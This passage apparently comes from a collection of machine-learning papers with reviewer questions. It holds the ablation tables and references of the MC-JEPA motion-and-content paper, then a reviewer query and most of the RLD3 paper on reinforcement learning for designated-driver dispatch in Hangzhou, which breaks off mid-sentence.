| | ✓ | ✓ | ✓ | ✓ | 2.67 | 2.81 | 3.51 | 67.1 | 70.5 | Table 3: **Ablation: estimator architecture.** Comparison between different flow estimator size form of normalization. The factor size influences the number of filters in each convolution of the estimator. LN means layer norm means usage of layer norm after every layer of the estimator, except the last one. L2 means l2-normalization before the last layer of the estimator. | Factor size | #Params | LN | 12 | K15 clean | final | ISeg | VSeg | |-------------|---------|----|----|-----------|-------|------|------| | 1 | 2M | ✓ | | crashed | | | | | 1 | 2M | ✓ | | 2.68 | 2.88 | 3.57 | 67.0 | 70.2 | | 1 | 2M | ✓ | | 6.21 | 6.04 | 6.99 | 53.2 | 47.9 | | 1 | 2M | ✓ | ✓ | 4.55 | 4.47 | 5.66 | 62.3 | 63.6 | | 2 | 8M | ✓ | | 2.67 | 2.81 | 3.51 | 67.1 | 70.5 | ### 4.3 ABLATIONS We perform many ablations on the components and training procedure of MC-JEPA, and evaluate our models on KITTI 2015 train (K15 in tables, metric is EPE), Sintel clean and final (clean and final in tables, metric is EPE), Pascal VOC linear frozen evaluation (ISeg in tables, metric is mIoU), and DAVIS 2017 video segmentation (VSeg in tables, metric is \((J\&F)_m\)), which are all relatively fast to perform. **Flow datasets.** We start by evaluating the effect of varying the set of data used flow estimation. Table 2 presents our results when incorporating or not various datasets. As expected, training on only KITTI or Sintel offers great performance in their respective evaluation set. Progressively adding FlyingChairs and Things, and HD1k, improves the flow results, but has very little influence on the segmentation tasks. The benefit on segmentation from doing flow estimation is independent from the domain on which the flow estimator is trained. **Flow estimator architecture.** When pretraining in our multi-task setup with ImageNet we observed many instabilities related to the gradient and the exploding norm of the estimator, and that we describe in Section A. We tried several changes to the flow estimator architecture to overcome these issues, namely using LayerNorm and l2-normalization. Table 3 presents our results when incorporating these elements, as well as when increasing the size of the estimator. Not regularizing the estimator led to crashing runs. l2-normalization is very inefficient, as it constrains the last layer to directly produce flows in the correct range of values. Using LayerNorm is the best solution and effectively prevents the estimator from exploding norms and gradients. Increasing the size of the estimator marginally improves the results. **Backbone.** Our backbone is a ConvNeXt-T (Liu et al., 2022), we study the impact of pretraining models with other backbones, in particular ResNet-50, and the backbone of PWC-Net (Sun et al., 2018) commonly used by concurrent flow estimation methods. Table 4 presents our results. The original PWC backbone is not adapted to learn good content features, and Resnet-50 results are not as good as ConvNeXt-T results. **Data sampling.** We experiment with different strategies for sampling the data. For a simple baseline, we use a pretrained self-supervised model in ImageNet and train the flow estimator on top of the frozen features, or by fine-tuning the model. We demonstrate the usefulness of multi-task learning by playing with various other strategies; either we alternate between one epoch of ImageNet learning and one epoch of flow estimation, or we alternate between one batch of each, or we finally sample a batch from each, and back-propagate through the addition of the losses. Table 5 presents our results for each strategy. Training the flow estimator on top of frozen features is too hard of a constraint, but even when fine-tuning is done, optimizing the flow estimation task degrades the performance on segmentation too much. Alternating between epochs is not optimal, and the best solution is to alternate between batches and even combine the losses for optimal flow estimation results. Table 4: **Ablation: backbone.** Comparison of the performance of MC-JEPA when using different backbones. | Backbone | #Params | K15 | clean | final | ISeg | VSeg | |--------------|---------|-----|-------|-------|------|------| | PWC-Net | 8M | 2.66| 2.80 | 3.47 | 14.8 | 10.1 | | ResNet-50 | 21M | 2.71| 2.85 | 3.59 | 55.8 | 60.1 | | ConvNeXt-T | 23M | 2.67| 2.81 | 3.51 | 67.1 | 70.5 | Table 5: **Ablation: data sampling.** Comparison between different training order and data sampling strategies. | Strategy | K15 | clean | final | ISeg | VSeg | |---------------------------|-----|-------|-------|------|------| | Flow estimator training | 13.52| 13.82 | 14.81 | 60.1 | 65.2 | | Flow estimator fine-tuning| 2.71 | 2.82 | 3.77 | 61.3 | 62.3 | | Epoch alternation | 4.54 | 4.91 | 5.57 | 63.5 | 66.9 | | Batch alternation | 2.78 | 2.95 | 3.62 | 67.1 | 70.5 | | Combined loss | 2.67 | 2.81 | 3.51 | 67.1 | 70.5 | Figure 5: (1) **Ablation: flow start epoch.** Flow estimation performance as a function of the ImageNet training epoch from which flow estimation starts. There are 100 pretraining epochs in total. (2) **Ablation: cycle consistency coefficient.** Flow estimation performance as a function of the coefficient used to balance the cycle consistency loss of Eq (5). (3) **Ablation: multi-task balancing coefficient.** Flow estimation and segmentation performance as a function of the balancing coefficient between flow losses and SSL loss in Eq (7). **Flow start epoch.** We found that starting multi-task learning of flow and content features at the beginning of training was not necessary, as the features are changing very fast, and we only start with ImageNet pretraining and introduce flow estimation after a given number of epochs. Figure 5 (1) shows that starting after 10 epochs of ImageNet pretraining is the best among several values, when the total number of epochs is fixed to 100. Starting later and doing fewer flow estimation epochs saves a lot of computation time while giving similar results. **Cycle consistency.** Figure 5 (2) shows an ablation on the cycle consistency coefficient that controls the importance of the cycle consistency loss of Eq (5). Introducing the loss significantly improves the flow estimation, which is explained by the fact that it adds an additional constraint on the embeddings to be predictable from each other. The coefficient needs to be carefully tuned, as the performance is very sensitive to it. **Multi-task balancing coefficient.** Figure 5 (3) shows an ablation on the multi-task coefficient that balances our flow estimation loss and our content features loss. We already observe a significant improvement when introducing flow estimation, even with a very small coefficient. As we increase the coefficient, both the flow estimation and segmentation improve until we reach a threshold (0.1), after which the segmentation results degrade a lot. This shows that even if flow estimation improves the segmentation performance, there is a trade-off between learning motion and content features, and tuning the multi-task coefficient is crucial to maintain a strong level of performance for both. 5 CONCLUSION We have introduced MC-JEPA, a multi-task approach to learning of motion and content features with self-supervised learning and optical flow estimation. MC-JEPA performs well in a wide variety of tasks, ranging from optical flow estimation to segmentation of images and videos. We hope that our approach will foster the use of multi-task learning in self-supervised learning, which might be a path towards learning features that generalize to any downstream task. Future work will learn motion and content from larger collections of natural videos and train the two objectives in a shared data domain, capturing short- and long-range interactions in a hierarchical way. REFERENCES Geiger A., Lenz P., Stiller C., and Urtasun R. Vision meets robotics: The kitti dataset. In *IJRR*, 2013. Mahmoud Assran, Mathilde Caron, Ishan Misra, Piotr Bojanowski, Florian Bordes, Pascal Vincent, Armand Joulin, Michael Rabbat, and Nicolas Ballas. Masked siamese networks for label-efficient learning. In *ECCV*, 2022. Mahmoud Assran, Quentin Duval, Ishan Misra, Piotr Bojanowski, Pascal Vincent, Michael Rabbat, Yann LeCun, and Nicolas Ballas. Self-supervised learning from images with a joint-embedding predictive architecture. *arXiv preprint arXiv:2301.08243*, 2023. Jimmy Lei Ba, Jamie Ryan Kiros, and Geoffrey E. Hinton. Layer normalization. *arXiv preprint arXiv:1607.06450*, 2016. Shaojie Bai, Zhengyang Geng, Yash Savani, and J. Zico Kolter. Deep equilibrium optical flow estimation. In *CVPR*, 2022. Hangbo Bao, Li Dong, Songhao Piao, and Furu Wei. Beit: Bert pre-training of image transformers. In *ICLR*, 2022. Adrien Bardes, Jean Ponce, and Yann LeCun. Vicreg: Variance-invariance-covariance regularization for self-supervised learning. In *ICLR*, 2022a. Adrien Bardes, Jean Ponce, and Yann LeCun. Vicregl: Self-supervised learning of local visual features. In *NeurIPS*, 2022b. Zhangxing Bian, Allan Jabri, Alexei A. Efros, and Andrew Owens. Learning pixel trajectories with multiscale contrastive random walks. In *CVPR*, 2022. Thomas Brox, Andres Bruhn, Nils Papenberg, and Joachim Weickert. High accuracy optical flow estimation based on a theory for warping. In *ECCV*, 2004. Daniel J Butler, Jonas Wulff, Garrett B Stanley, and Michael J Black. A naturalistic open source movie for optical flow evaluation. In *ECCV*, 2012. Mathilde Caron, Piotr Bojanowski, Armand Joulin, and Matthijs Douze. Deep clustering for unsupervised learning. In *ECCV*, 2018. Mathilde Caron, Ishan Misra, Julien Mairal, Priya Goyal, Piotr Bojanowski, and Armand Joulin. Unsupervised learning of visual features by contrasting cluster assignments. In *NeurIPS*, 2020. Mathilde Caron, Hugo Touvron, Ishan Misra, Herve Jegou, and Julien Mairal Piotr Bojanowski Armand Joulin. Emerging properties in self-supervised vision transformers. In *ICCV*, 2021. Mathilde Caron, Neil Houlsby, and Cordelia Schmid. Location-aware self-supervised transformers. *arXiv preprint arXiv:2212.02400*, 2023. Ting Chen, Simon Kornblith, Mohammad Norouzi, and Geoffrey E. Hinton. A simple framework for contrastive learning of visual representations. In *ICML*, 2020a. Xinlei Chen and Kaiming He. Exploring simple siamese representation learning. In *CVPR*, 2020. Xinlei Chen, Haoqi Fan, Ross Girshick, and Kaiming He. Improved baselines with momentum contrastive learning. *arXiv preprint arXiv:2003.04297*, 2020b. Xinlei Chen, Saining Xie, and Kaiming He. An empirical study of training self-supervised vision transformers. In *ICCV*, 2021. Yubei Chen, Adrien Bardes, Zengyi Li, and Yann LeCun. Intra-instance vicreg: Bag of self-supervised image patch embedding. *arXiv preprint arXiv:2206.08954*, 2022.
K7l94Z81bH
Can you clarify the data sparsity issue, why 3000 drivers with 13000 orders a day is considered sparse. And what are the effect on the learning algorithm? The performance of other DRL algorithms are not too bad, which is not what I would expect for a data sparse environment.
Sparsity-Aware Grouped Reinforcement Learning for Designated Driver Dispatch Anonymous authors Paper under double-blind review Abstract Designated driving service is a fast-growing market that provides drivers to transport customers in their own cars. The main technical challenge in this business is the design of driver dispatch due to slow driver movement and sparse orders. To address these challenges, this paper proposes Reinforcement Learning for Designated Driver Dispatch (RLD3). Our algorithm considers group-sharing structures and frequent rewards with heterogeneous costs to achieve a trade-off between heterogeneity, sparsity, and scalability. Additionally, our algorithm addresses long-term agent cross-effects through window-lasting policy ensembles. We also implement an environment simulator to train and evaluate our algorithm using real-world data. Extensive experiments demonstrate that our algorithm achieves superior performance compared to existing Deep Reinforcement Learning (DRL) and optimization methods. 1 Introduction Designated driving, also known as chauffeur service and substitute driving, is an emerging business in the field of mobility service platforms. These platforms offer professional drivers to transport customers who are unable to drive, such as drunk drivers, rookie drivers, and tired drivers. The designated driver arrives with an electric scooter and drives the customer to their destination, as shown in Figure 1. The platform controller manages dispatching behaviors to improve customers’ experience and drivers’ income. Designated driving has become a significant and promising industry, with a market size of over 4 billion in China (BusinessGrowthReport, 2022). One of the critical challenges in this industry is the design of driver dispatch, also known as the fleet management problem. While typical ride-hailing platforms focus on improving the matching quality between drivers and customers, designated driving platforms still struggle to find a driver for each order. This is due to the sparsity of designated drivers and their slow movement. Besides, designated orders have “hub-and-spoke” structures, with origins concentrated in specific hotspots (e.g., bars, restaurants) and destinations primarily being residential areas, which often result in drivers being far away from potential customers. Optimization methods are commonly used to address fleet management problems (Zhang et al., 2017; Robbenolt & Levin, 2023), but they require a certain level of modeling for the supply and demand dynamics, which is complex in the real world. Recently, many Deep Reinforcement Learning (DRL) approaches have been proposed to solve fleet management problems in ride-hailing services (Oda & Joe-Wong, 2018; Al-Kanj et al., 2020; Zhang et al., 2020; Liu et al., 2020; Shou & Di, 2020; Qin et al., 2021; Eshkevari et al., 2022; Liu et al., 2022; Zheng et al., 2022). However, designated drivers present unique challenges compared to traditional taxi ride-hailing systems. The challenges stem mainly from the sparsity, which can be attributed to three key factors. Firstly, the dataset itself exhibits sparsity. In the case of designated driving, the number of drivers is considerably smaller compared to taxi drivers, resulting in a sparser spatial-temporal distribution. To illustrate, our dataset collected from Hangzhou, a Chinese city with a population of approximately 10 million, has only around 3,000 designated drivers and nearly 13,000 order requests per day. Secondly, individual drivers experience sparse feedback on the direct matching of orders. As designated drivers move slowly and are often located far away from available orders, each driver, on average, completes only 3 to 4 orders per day. Additionally, after matching with an order, the driver also spends a significant amount of time on the way to pick up the client. Thirdly, the cross-effect of agents is sparse and long-lasting. This is due to the slow and continuous impact of driver movements on their distribution, which is crucial in fleet management. Before each driver is matched with an order, they typically engage in continuous movement for several quarters. Therefore, considering the lasting impact becomes more crucial than focusing solely on the transient movements of other agents. Moreover, the heterogeneity and scalability of agents pose additional challenges for traditional MARL algorithms. Factors such as varying speeds and mileage limitations among different drivers, as well as the fluctuating number of drivers commuting to work each day, further contribute to these challenges. To address these challenges, this paper proposes a group-sharing window-lasting Reinforcement Learning framework for Designated Driver Dispatch problems, RLD3. We model the problem as a Decentralized Partially Observed Markov Decision Process (Dec-POMDP), capturing the fact that drivers usually have local observations. RLD3 incorporates several novel designs. Firstly, we introduce a group-sharing structure, where agents are classified into several groups. Agents within the same group share the same network parameters and experience data. This design strikes a balance among sparsity, heterogeneity, and scalability. Secondly, we design a reward structure for the DRL algorithm. This specially designed reward estimates the potential of the neighborhood around the driver by considering the distances of all unmatched orders in that area, addressing the issue of sparse feedback. It also incorporates complicated movement constraints by applying heterogeneous moving costs. Thirdly, we design a time window to calculate the cumulative actions of agents during consecutive execution periods, allowing estimation of other agents’ policies and making it suitable for sparse and lasting multi-agent interactions. Finally, we implement an environment simulator using real-world designated driving datasets and conduct extensive experiments to train and evaluate different algorithms. The results demonstrate that RLD3 outperforms existing DRL benchmarks and optimization policies in terms of completed order numbers and adherence to moving constraints. The main contributions of this paper are summarized as follows: i) We are the first to formulate a general Dec-POMDP framework for designated driver dispatch problems in designated driving markets. ii) We propose a novel MARL algorithm, RLD3, to address the challenges of designated driver dispatch and achieve trade-off among scalability, heterogeneity, and sparsity. This algorithm builds upon group-sharing structures and window-lasting agent interactions with a potential/cost-aware reward. iii) We design a designated driving simulator using real-world datasets and conduct extensive experiments. The results show that RLD3 efficiently learns system dynamics and outperforms existing DRL and optimization methods. 2 RELATED WORK Driver Dispatch. As mentioned in Section 1, the driver dispatch problem has been extensively investigated in the existing literature. Two prominent methodologies have garnered significant attention: optimization algorithms (Zhang et al., 2016; Robbennolt & Levin, 2023) and DRL-based algorithms (Oda & Joe-Wong, 2018; Al-Kani et al., 2020; Zhang et al., 2020; Liu et al., 2020; Shou & Di, 2020; Qin et al., 2021; Eshkevari et al., 2022; Liu et al., 2022; Zheng et al., 2022). Optimization algorithms leverage historical driver and order distributions to formulate dispatch policies, but they require precise knowledge of demand-supply dynamics, which is challenging to obtain in the real world. DRL-based algorithms are powerful in solving driver dispatch problems as they can learn a parametric model without relying on strong problem-based assumptions and can optimize long-term effects through sequential decision-making. However, taxi drivers move at a faster speed, and taxi orders are much denser and more balanced. These features significantly reduce the sparsity challenges faced by traditional DRL-based dispatch algorithms. Thus, it is difficult to directly transfer the models and algorithms to the designated driving platform. **Reinforcement Learning.** Reinforcement learning (RL) techniques have shown promise in addressing complex multi-agent problems. The Multi-Agent Deep Deterministic Policy Gradient algorithm (MADDPG) (Lowe et al., 2017) extends the Deep Deterministic Policy Gradient (DDPG) (Lillicrap et al., 2016) and Deterministic Policy Gradient algorithms (Silver et al., 2014) by using deep neural networks to approximate action values and handle agent interactions. Such algorithms within the traditional CTDE paradigm (Claus & Boutilier, 1998) often allow agents to achieve good overall performance by utilizing heterogeneous strategies. However, due to the independent nature of each agent’s policy, they encounter the challenge of sparse feedback in the designated driving problem, leading to lower efficiency in exploration and policy learning. To address sparsity, Random Network Distillation (RND) (Burda et al., 2019) uses an additional value function to estimate intrinsic reward in order to enhance exploration. In the designated driving platform, due to the unique “hub-and-spoke” structure of orders, the hotspots of orders are more concentrated. Exploring non-semantic information would result in excessive driver movement costs. Curriculum Learning approaches, such as Curriculum Deep Reinforcement Learning (Hacohen & Weinshall, 2019) and Relevant Curriculum Reinforcement Learning (Flet-Berliac & Preux, 2020), help in learning from sparse feedback by planning the neural network’s learning path. However, planning learning paths in multi-agent scenarios is challenging due to the complex dynamics of cooperation and competition among drivers. Mean-Field Reinforcement Learning (MFRL) techniques, such as Mean Field Multi-Agent Reinforcement Learning (MFMARL) (Yang et al., 2018) and Multi-Agent Mean Field Q-Learning (Ganapathi Subramanian et al., 2020), model agent interactions as the interaction between a single agent and a field effect. Mean-field methods can address the issue of sparse agent distributions but lack consideration for the lasting interaction of different drivers, which should be taken into account since designated drivers have slow movement and complex constraints. To address scalability and heterogeneity, Hierarchical Reinforcement Learning (HRL) approaches, such as Feudal HRL (Vezhnevets et al., 2017), Data-Efficient HRL (Nachum et al., 2018), and Model-Free HRL (Rafati & Noelle, 2019), decompose large-scale problems into sub-agents. But in the context of designated driver dispatch, additional attention should be paid to the complex interactions among agents and various sparsity issues as mentioned before. ### 3 RLD3: Reinforcement Learning for Designated Driver Dispatch In this section, we present the formulation of the Decentralized Partially Observed Markov Decision Process (Dec-POMDP) for the designated driver dispatch problem. We introduce three unique designs in our algorithm: the grouped structure, the potential reward, and the lasting agent interaction. #### 3.1 Formulation We consider the designated driving service in one metropolis. Each day, there are $N$ drivers with random initialization. Orders appear in the system at specific times and locations. Unmatched orders have limited patience and will be canceled after a waiting period following a Poisson distribution. Drivers that have completed their corresponding orders leave the system after off-duty time. For simplicity, we assume that time in the system is slotted, with each time step corresponding to 30 seconds. At each time step, the platform decides the dispatch movement for every idling driver. We assume that drivers fully comply with movement instructions. The statuses of drivers and orders are updated until the next time step due to matches between idling drivers and unmatched orders, as well as the generation/completion processes. The Dec-POMDP formulation $\langle N, S, \emptyset, A, P, R, \gamma \rangle$ is presented as follows: **Agent** $i \in [N]$: Each driver is considered an agent, resulting in a total of $N$ unique agents. The platform can only dispatch idling drivers, as each agent can be in one of three statuses: offline, idle, or serving orders at any given time $t$. State \( s \in S \): At each time \( t \), a global state is maintained, taking into account the status of all drivers and orders. This includes coordinates, moving distance, working status, serving targets, and moving targets for drivers. The state also includes calling time, patience, origin, destination, and serving status for orders. Observation \( s \mapsto o_i \in O \): Drivers have partial observations of the state \( s \). In our implementation, each agent’s observation is represented by a 22-dimensional vector: \[ ([\#\text{order}], [\#\text{driver}], [\min \text{dist}], t, \text{lat}, \text{lng}, \text{move}), \] where the first three terms denote the number of orders to be matched, the number of idling drivers, and the distance to the closest order in six-segment-direction neighborhoods as shown in Figure 12. The last four terms represent time, latitude, longitude, and the distance the driver has already moved. Action \( a_1 \times \cdots \times a_N \in A \): The platform proposes a joint action instructing the movement policy for all available drivers based on their observations \( o_t \) at time \( t \). The action space for an individual agent consists of seven discrete actions including six neighboring directions and staying at the current location as shown in Figure 11. Agents located at the boundary and corners have a smaller action space. State Transition \( P : s \times a[N] \mapsto s' \): The movement of drivers, along with order updates and matches between drivers and orders, induces state transitions in the environment. Reward \( r_i \in \mathbb{R} \): After executing an action, each agent receives its distinct instant reward \( r_i \). The instant reward \( r_i^t \) is defined as the sum of the immediate match reward, neighborhood potential reward, and move cost: \[ r_i^t = mt_i^t + nb_i^t + mv_i^t. \] Immediate match reward \( mt_i^t \) directly relates to the gross merchandise volume of the platform, which is the objective of our algorithm. To optimize volume without using discriminatory personal information, the immediate match reward is set to a fixed number: \[ mt_i^t = \begin{cases} 50, & \text{if agent } i \text{ is matched with an order at } t; \\ 0, & \text{otherwise.} \end{cases} \] The move cost and neighborhood potential reward will be introduced in Section 3.2 and 3.3. 3.2 Towards Dataset Sparsity through Group Sharing We introduce the concept of group sharing to address dataset sparsity issues in our approach. Meanwhile, we estimate the influence between these groups using the mean-field effect to ensure heterogeneity and scalability. In real-world scenarios, drivers can be classified into several types based on their cost conditions. These endogenously heterogeneous agents are naturally mediated into several groups. Agents within the group share the same network along with their experience data in the training process. Specifically, we divide the \( N \) agents into \( M \) classes, where \( M \) is a fixed number. To control grouped drivers’ moving distance, we include move cost \( mv_i^t \) as a regularizer that influences the behavior of agents in the reward. The move cost for agent \( i \) at time \( t \) is set as follows: \[ mv_i^t = \begin{cases} -c_j, & \text{if agent } i \text{ moves;} \\ 0, & \text{if agent } i \text{ stays;} \end{cases} \] where \( j \) is the group index of agent \( i \). RLD3 utilizes double critic-networks and double actor-networks, with the delayed copy used for soft-update. During the training stage, a group network can access the experienced data of all agents belonging to that group, stored in a replay buffer. Therefore, a network can efficiently explore different individuals of the same category in the metropolis and gather more experiences. During the execution stage, each agent calls its corresponding group network to perform policy execution independently. The policy input for each agent is based on its current observation while the output is its deterministic action. To transform the continuous output seven-dimensional vector into a deterministic action, the last layer uses Gumble-Softmax (Jang et al., 2017). Such mixed strategy ensures that even agents of the same group at the same location may execute different discrete actions, avoiding competition among agents. The information flow during the execution stage is illustrated in Figure 2. 3.3 Towards Feedback Sparsity through Space Potential Since the immediate match reward is highly sparse for the DRL method in designated driving platforms (i.e., it only occurs at the time step with a successful order match, which is rare), we introduce a dense neighborhood potential reward $nb_i^t$ to reflect the potential value of the current area. The intuition is that the distance to an order in the neighborhood reflects how fast an agent can pick up the order. Almost all orders in the neighborhood are attractive to the driver, although the closest ones are especially attractive. Specifically, we assign potential values to nearby unmatched orders, with higher feedback given to closer orders. We then sum up all potential values to represent the total potential value of the driver’s current position. This provides reward feedback to the driver at every time step, compensating for the sparse immediate match reward. The potential reward is defined as follows: $$nb_i^t = (d^* + 0.1)^{-0.5} + 0.1 \times \sum_{\text{neighbor order } j} (d_{ij} + 0.1)^{-0.5},$$ where $d_{ij}$ denotes the distance from driver $i$ to order $j$, and $d^*$ denotes the distance to the closest order. The power index is set to $-0.5$ to ensure that the potential reward increases as the distance approaches and is a convex function, in order to encourage designated drivers to approach a specific order rather than maintain an equal distance from all orders. 3.4 Towards Interaction Sparsity through Window Lasting In designated driving platforms, agents are often far away from each other, resulting in sparse and long-term agent interactions instead of single-step actions. For example, a driver’s income is not directly influenced by the short-term actions of drivers located far away, but rather by the accumulated distribution changes caused by the lasting movements of drivers. Therefore, we use the average action over a time window, instead of a single-step action, when considering other agents’ policies. To achieve this, in addition to recording regular tuples $(s, a[N], r[N], s')$, the buffer calculates and stores the window-lasting actions for all agents. The window-lasting action $\tilde{a}_i$ represents the average of sequential idling actions for the last $W$ time steps: $$\hat{a}_t^i = \mathbb{E} [a_t^i], s \sim [t - W, t] \cap T_{\text{last idle}},$$ (6) where $T_{\text{last idle}}$ refers to the most recent period in which the driver was idling, considering possible different idling periods that may result in diverse moving directions. Thus, the mean-field effect for group $j$ is defined as: $$g_j^t = \mathbb{E}_{t \in \text{group } j} [\hat{a}_t^i].$$ (7) Additionally, we use an encoder in the input of the critic to handle complex state representations and their varying dimensions. This encoder is responsible for the distribution of the current unmatched orders and idling agents respectively. We employ the K-Means algorithm (Hartigan & Wong, 1979) for this encoder. Therefore, the input structure of the critic network is $Q_i(o_i, \text{encode}(s), a_i, g[M])$, as shown in Figure 3. All networks utilize two fully connected layers and the GELU activation function (Hendrycks & Gimpel, 2016). ![Network structure](image) Figure 3: Network structure. ### 3.5 NETWORK UPDATE The network update follows the gradient-based actor-critic paradigm. To ensure smoother driver trajectories, we add the temporal difference of adjacent actions $H(a, a') = \|a - a'\|_2$ to the Bellman loss as the critic loss. After incorporating the above techniques, the loss function for the value network becomes: $$L(\theta_i) = \mathbb{E}_{\text{sample} t} \left[ (Q^\pi_i(o_i, \text{encode}(s), a_i, g[M]) - y)^2 + \lambda H(a_i, a'_i) \right],$$ $$y = r_i + \gamma Q^{\pi'}_i(o'_i, \text{encode}(s'), a'_i, g[M]).$$ (8) Similarly, the gradient of the policy network is now: $$\nabla_{\theta_i} J(\pi_i) = \mathbb{E}_{\text{sample} t} \left[ \nabla_{\theta_i} \pi_i(a_i | o_i) \nabla_{a_i} Q^\pi_i(o_i, \text{encode}(s), a_i, g[M]) | a_i = \pi_i(o_i) \right].$$ (9) The complete algorithm framework is summarized in Algorithm 1. ### 4 SIMULATOR & EXPERIMENT We design and implement a simulator based on real-world datasets to train and evaluate RL algorithms for the designated driver dispatch problem. We then conduct experiments on our proposed model using the simulator and real-world data. We sample 50 drivers and 500 orders for the training stage. Each experiment is repeated with 4 different seeds, and the average results with confidence intervals are presented. To mitigate the sparsity issue in early training, we use the first 100 episodes for random exploration. Algorithm 1 RLD3. Require: order data, driver pool $[N]$, episode number $MAX$, episode length $T$, learning rate $\lambda$, update rate $\tau$, batch size $S$, group number $M$, window size $W$. 1: for episode from 1 to $MAX$ do 2: Initialize environment and receive an initial state $s$. 3: for $t$ from 1 to $T$ and not all drivers are off-line do 4: Generate action $a_t = \pi_t(o_t)$. 5: Execute action $(a_1, a_2, \cdots, a_N)$ and observe reward $r$ and next state $s'$. 6: Push $(s, a, r, s', \hat{a})$ into buffer. 7: $s = s'$. 8: end for 9: for group $j$ from 1 to $M$ do 10: Sample a batch of $S$ samples $(s, o_i, a_i, r_i, s', \hat{a}_i)(i \in \text{group } j)$ from replay buffer. 11: Update critic by minimizing $L(\theta_j)$. 12: Update actor using sample policy gradient $\nabla_{\theta_j} J$. 13: end for 14: Update the target network parameter for each agent $i$ by $\theta'_i = \tau \theta_i + (1 - \tau) \theta'_i$. 15: end for 4.1 Simulator The simulator is built based on real-world designated driver and order datasets from Hangzhou, a city in China. The datasets include over 3,000 drivers and nearly 13,000 orders per day. Each order’s information consists of its coordinates and the time of generation, match, completion, and possible cancellation. Each driver’s information includes their online time, offline time, and online coordinates. The simulator models the entire process of how the states of drivers and orders evolve. It includes a driver dispatch module that allows for the repositioning of any idling driver. The simulator serves as a training environment for RL algorithms and can also evaluate the performance of various dispatch policies. The detailed introduction of the simulator is in Appendix A. 4.2 Performance Comparison We compare the performances of our algorithm with existing DRL methods and optimization-based policies. The benchmark DRL algorithms include independent DDPG (Lillicrap et al., 2016), MADDPG (Lowe et al., 2017), MAMFRL (Yang et al., 2018), and multi-agent version RND (Burda et al., 2019). These algorithms are applied with the immediate match reward and move cost to achieve a trade-off between match and movement. All DRL algorithms use the same two hidden layers of dimension 64 and batch size of 512. The update rate is set to 0.01, and the learning rate policy uses the Adam optimizer (Kingma & Ba, 2015) with an initial rate of 0.01. All DRL algorithms are trained for 1000 episodes. In RLD3, the lasting window size is set to 60 steps, and the group number is set to 5. The optimization-based policies included order-oriented random-walk, Max-throughput dispatch policy (Robbenolt & Levin, 2023), and model predictive control (MPC) (Zhang et al., 2016). To ensure fairness in comparison, optimization-based methods estimate the current order and driver dynamics based on past history. Figure 4: Training performance. The order of the legends in the figure is the same as the order of performances in the last episode. Table 1: Testing performance. The testing performance is evaluated based on the model that has the best episodic performance, while the IID generalization performance is measured using an additional testing dataset of 10 episodes that are separated from the training dataset. | Algorithm | Testing performance | IID generalization | |-----------------|---------------------|--------------------| | | Order | Distance (km) | Order | Distance (km) | | Our Algorithm | RLD3 | 237.2 ± 3.4 | 7.0 ± 1.3 | 234.0 ± 3.9 | 7.0 ± 1.3 | | Taxi-dispatch | Deep-dispatch | 233.3 ± 2.3 | 15.5 ± 2.4 | 229.0 ± 2.3 | 15.1 ± 2.3 | | DRL-based | DDPG | 186.9 ± 5.2 | 27.8 ± 3.0 | 183.1 ± 5.5 | 27.9 ± 3.1 | | | MADDPG | 215.7 ± 3.7 | 29.6 ± 0.6 | 212.0 ± 4.4 | 30.2 ± 0.5 | | | MADDPG-RND | 228.6 ± 3.5 | 65.3 ± 0.7 | 224.0 ± 3.7 | 66.3 ± 0.9 | | | MAMFRL | 224.3 ± 3.7 | 34.3 ± 5.3 | 221.1 ± 4.8 | 34.9 ± 5.5 | | Optimization | Random | 180.1 | 35.3 | 178.3 | 34.4 | | | Max-throughput | 229.8 | 73.2 | 228.8 | 73.1 | | | MPC | 228.1 | 1.7 | 228.2 | 1.5 | As shown in Figure 4 and Table 1, our model outperforms all other algorithms in terms of the number of completed orders and had a smaller moving distance compared to methods that had similar completed order performance. As mentioned in Section 2, RND falls into no-semantic exploration due to always moving; MADDPG and MAMFRL fail to differentiate the value of different directions when there are no nearby orders, resulting in a significant amount of random walking. For optimization baselines, the Max-throughput policy optimizes the Lyapunov drift by treating the drivers as servers, which in turn leads to intense competition among drivers for orders. As one of the most popular algorithms in control theory, MPC outperforms the DRL baselines, except for our proposed algorithm RLD3. 4.3 INDEPENDENT AND IDENTICALLY DISTRIBUTED (IID) GENERALIZATION We conducted IID Generalization experiments to assess the robustness and generalization of our algorithm. In IID Generalization, it is assumed that the data points in both the training and testing datasets are drawn independently and identically from the same underlying distribution (Kirk et al., 2023). The generalization performance is then synonymous with the test-time performance from IID samples. We sampled another 500 orders from the real-world data that were not seen during training in every episode. As shown in Table 1, our algorithm did not decline significantly in IID performance and still outperformed other methods. An interesting phenomenon is that all algorithms demonstrate good IID generalization performance. This is because the designated driving platform itself exhibits sparsity, and the hotspots of orders are concentrated. Since we maintain the same initial state for all drivers and the same order underlying distribution in the IID generalization test, drivers are still able to effectively transfer the learned hotspot information from previous experiences when moving. 4.4 ABLATION STUDY We conducted an ablation study on the group-sharing structure, agent interaction design, state encoder, and reward design to gain insights into our model’s settings and behavior. **Group Number.** The group number is a typical hyperparameter that determines the number of agent types. A larger group number can better represent the heterogeneity of drivers, but it also increases the storage pressure and training time. Additionally, a large group number may not learn well in sparse feedback situations. The results in Table 2 show that the group-sharing structure helps improve the performance of MADDPG and our proposed algorithm RLD3. **Window-lasting Agent Interaction.** Our algorithm uses a window-lasting policy ensemble in the updating stage to better learn the cross-effects of other agents’ policies. We evaluated the algorithm without the window average. As shown in Table 2, the model without the window-lasting interaction cannot learn others’ policies well. This could be due to high-frequency fluctuations in agent actions that are difficult to learn, as Table 2: Ablation study. | Algorithm | Order | Distance (km) | |----------------------------|---------|---------------| | RLD3 | 237.2 ± 3.4 | 7.0 ± 1.3 | | RLD3 for 1 group | 150.5 ± 9.2 | 21.5 ± 1.2 | | RLD3 for 50 groups | 231.7 ± 3.6 | 9.1 ± 0.4 | | MADDPG for 5 groups | 223.0 ± 3.6 | 24.5 ± 1.2 | | MADDPG-RND for 5 groups | 211.5 ± 7.4 | 56.1 ± 1.8 | | MAMFRL for 5 groups | 227.0 ± 10.2| 6.1 ± 1.7 | | RLD3 without window-lasting| 229.5 ± 3.2 | 27.1 ± 3.4 | | RLD3 without state encoder | 232.2 ± 3.7 | 27.2 ± 1.6 | | RLD3 without potential reward | 223.8 ± 3.8 | 6.7 ± 1.2 | | RLD3 without move cost | 210.7 ± 6.7 | 48.3 ± 2.6 | well as the fact that single-step actions may not be executed for agents that are not idling. Consequently, the value function underfits when other agents’ policies are ensembled without the window average. State Encoder. To capture the distribution information of orders and drivers during the training stage, we employ an encoder to encode the system’s state. It is worth noting that due to the varying number of orders and 